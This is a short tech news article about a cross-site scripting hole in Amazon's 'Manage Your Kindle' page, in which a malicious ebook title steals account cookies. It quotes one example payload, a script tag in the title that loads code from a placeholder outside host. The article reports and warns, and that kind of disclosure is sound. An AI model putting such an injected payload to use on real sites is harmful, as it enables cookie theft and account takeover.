If you download Kindle ebooks from dubious sources aka anywhere other than Amazon, watch out. A security researcher has discovered a security hole in the “Manage Your Kindle” page on Amazon’s website that outs your Amazon credentials to hackers when you upload a malicious ebook.
Amazon’s provides an extremely handy “Send to Kindle” plugin for Windows and Mac to help users send personal documents to their Kindle devices, including ebook files obtained from sources other than Amazon itself. You can choose to archive these in your Kindle Library on the cloud to conveniently zap them to all your Kindles at any time.
According to The Digital Reader, a hacker can gain access to your Amazon account by simply getting you to download and ebook file, which itself was hacked to include a script like <script src=”https://www.example.org/script.js“></script> in the title.
Once the book is added to your library, the code will be executed as soon as you open the library in a web page. It allows the hacker to access your Amazon cookies and thus take over your account.
The researcher, Benjamin Musser, says that he first discovered the flaw in October last year and reported it to Amazon, which instantly fixed it. However, it seems to have crept back in after the company revamped the “Manage Your Kindle” page.
How do you avoid getting bit? Don’t pirate ebooks, for one. And if you do, don’t send them to your Kindle using Amazon’s Kindle Library. Just copy them to your device over USB. But seriously, don’t pirate them in the first place. [The Digital Reader via Engadget]